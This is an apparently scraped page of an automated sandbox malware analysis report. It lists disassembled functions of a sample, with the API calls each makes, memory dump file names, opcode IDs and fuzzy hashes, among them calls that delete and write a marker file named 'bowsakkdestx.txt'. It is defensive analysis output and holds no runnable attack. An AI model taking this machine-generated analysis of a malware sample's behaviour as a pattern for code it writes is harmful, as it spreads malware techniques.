                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                                                                                        • String ID: 0$>>
                                                                                                                                                                        • API String ID: 1693014935-193288283
                                                                                                                                                                        • Opcode ID: db2d2e80d4545769dd3d16753b7542e6bebdb4bb3720e354a86b83784f077813
                                                                                                                                                                        • Instruction ID: 64f548c6c2f229536ac6ae12071f3c8e4a34f2b84fedfaa81d737de6cb3ecf9c
                                                                                                                                                                        • Opcode Fuzzy Hash: db2d2e80d4545769dd3d16753b7542e6bebdb4bb3720e354a86b83784f077813
                                                                                                                                                                        • Instruction Fuzzy Hash: 76F0AFB4C1531CABEB01DF91D9197AEBBB8BB09308F104259D5147A280D7BA1618CF95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EC420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002EC438
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002EC44E
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002EC45B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 610490371-2616962270
                                                                                                                                                                        • Opcode ID: f63ed7de15ba6751ca62ff829930b338e1c6f89362b2a77122b2b9bd9107ef16
                                                                                                                                                                        • Instruction ID: 9a9cdbd3c1dd1b06992ba6c06bb83787b61714d434724ea9f505fce21163a1fc
                                                                                                                                                                        • Opcode Fuzzy Hash: f63ed7de15ba6751ca62ff829930b338e1c6f89362b2a77122b2b9bd9107ef16
                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE086B569031C6BEF20ABA0DD8AFD5776C9B15B01F400092BB44D21C0D6F4A5848A51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove_strtok
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3446180046-0
                                                                                                                                                                        • Opcode ID: 77a58e715f554e714862d9480f32c9e7165bdbd878e34224f2005b2abfd004f1
                                                                                                                                                                        • Instruction ID: b22155cf5b2b7f1a442ae782cd44742d67471682a087e346bcac55027009d22d
                                                                                                                                                                        • Opcode Fuzzy Hash: 77a58e715f554e714862d9480f32c9e7165bdbd878e34224f2005b2abfd004f1
                                                                                                                                                                        • Instruction Fuzzy Hash: F38127B091128ADFDF15CF59C88079EBBF5FF18304F95052CE80557281D3B6AA64CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00302130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                        • Opcode ID: f1e55ddf1b48320da422e8d24451972b863506930d60daf63cc4f741a3860e6f
                                                                                                                                                                        • Instruction ID: 7cd4f6afa010585d4c792ff2dba1bf72fe837ac209bd3ccd0f58eb3cdf504820
                                                                                                                                                                        • Opcode Fuzzy Hash: f1e55ddf1b48320da422e8d24451972b863506930d60daf63cc4f741a3860e6f
                                                                                                                                                                        • Instruction Fuzzy Hash: AB51F931A02305DBCF2A8FE9C86866FB7B9AF51320F258B29F835966D0D7709D50CB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0031C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0031C6AD
                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 0031C6DB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0031C0ED,?,00BFBBEF,00000003), ref: 0031C709
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0031C0ED,?,00BFBBEF,00000003), ref: 0031C73F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                        • Opcode ID: 1f275cb37772a1c7e3d62eaccf7df082e8c1b69e1a963ae25bff39435f4e2751
                                                                                                                                                                        • Instruction ID: 27dd84b4f7a933b249f8892c782ad529848ec148e37fb56fc492526da870d31d
                                                                                                                                                                        • Opcode Fuzzy Hash: 1f275cb37772a1c7e3d62eaccf7df082e8c1b69e1a963ae25bff39435f4e2751
                                                                                                                                                                        • Instruction Fuzzy Hash: 0031F230660246EFDB2B8E35CC44BEABBA9FF49310F166429E4548B1E0D770D890DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EF0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 002EF125
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 002EF198
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 002EF1A1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002EF1A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1421093161-0
                                                                                                                                                                        • Opcode ID: 518f529a45112c47e4caf5f6c15746193ae4d905fcf0c9de41870c0bd0548fe6
                                                                                                                                                                        • Instruction ID: 4cae65753338f2c020af5ba7676cffc9ea2f6e34063e7474a661d4f7ddacaa23
                                                                                                                                                                        • Opcode Fuzzy Hash: 518f529a45112c47e4caf5f6c15746193ae4d905fcf0c9de41870c0bd0548fe6
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D314632910249EBDB049F68CD5ABEFBB78EF06304F504128F9066B1C0D771AA54CBE0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003A7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 003A70AB
                                                                                                                                                                          • Part of subcall function 003A77A0: ___BuildCatchObjectHelper.LIBCMT ref: 003A77D2
                                                                                                                                                                          • Part of subcall function 003A77A0: ___AdjustPointer.LIBCMT ref: 003A77E9
                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 003A70C2
                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 003A70D4
                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 003A70F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                        • Instruction ID: fb8d2532da3210e2d92fb9f2fc9d41202f0ea2dbc04bd1454f2b6142c481f268
                                                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                        • Instruction Fuzzy Hash: 8901E532400109BBCF13AF55CC45EEA7BBAFF8A754F158114FD1866121D372E961EBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003053B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00305007: __getptd_noexit.LIBCMT ref: 00305008
                                                                                                                                                                          • Part of subcall function 00305007: __amsg_exit.LIBCMT ref: 00305015
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00305A01
                                                                                                                                                                          • Part of subcall function 00308C96: __calloc_impl.LIBCMT ref: 00308CA5
                                                                                                                                                                        • __lock.LIBCMT ref: 00305A37
                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00305A43
                                                                                                                                                                        • __lock.LIBCMT ref: 00305A57
                                                                                                                                                                          • Part of subcall function 00305208: __getptd_noexit.LIBCMT ref: 00305208
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2580527540-0
                                                                                                                                                                        • Opcode ID: 6c4c4a0cc6a6cb740e905aa06c9144985e4dfddc4a256014d3fcf14ebe5977ad
                                                                                                                                                                        • Instruction ID: feeab68f7b29c93d187b2f832cd9d1f4c569577f3464a1fea44600abc7eb67a3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c4c4a0cc6a6cb740e905aa06c9144985e4dfddc4a256014d3fcf14ebe5977ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 99015E71643740DBE723FFA89866B1EB7E0AF41720F204249F4A59F2C2DE745A418E61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003209B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                        • Instruction ID: 0d00aee2f51257006c6ea66278b1f60422c7388d88f9eab08932df03bdf91a0e
                                                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                        • Instruction Fuzzy Hash: 29014E3240015EBFCF175F84EC428EE3F66BB29354B598415FE1958032C636C9B5AB81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F27A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 002F27B9
                                                                                                                                                                        • _malloc.LIBCMT ref: 002F27C3
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 002F27CE
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 002F27E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        • Opcode ID: 70e919222fded17e0e3f07c20ed474c0ba194c4d879271287ce39a69393df72e
                                                                                                                                                                        • Instruction ID: 697c7ea0af2cd0c139d0f026b298399ff99eeb00ce3be5791398cc7f117b8e83
                                                                                                                                                                        • Opcode Fuzzy Hash: 70e919222fded17e0e3f07c20ed474c0ba194c4d879271287ce39a69393df72e
                                                                                                                                                                        • Instruction Fuzzy Hash: 36F05C35702204BBE72197659C4BFBBB6DDDF86760F100125F604E72C1E9516D0152F1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F2800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 002F2806
                                                                                                                                                                        • _malloc.LIBCMT ref: 002F2814
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 002F281F
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 002F2832
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        • Opcode ID: 7ca302b95abaf62ea75d686b6bc6ab29e87c5f509e24ab560bc2234ba0745c32
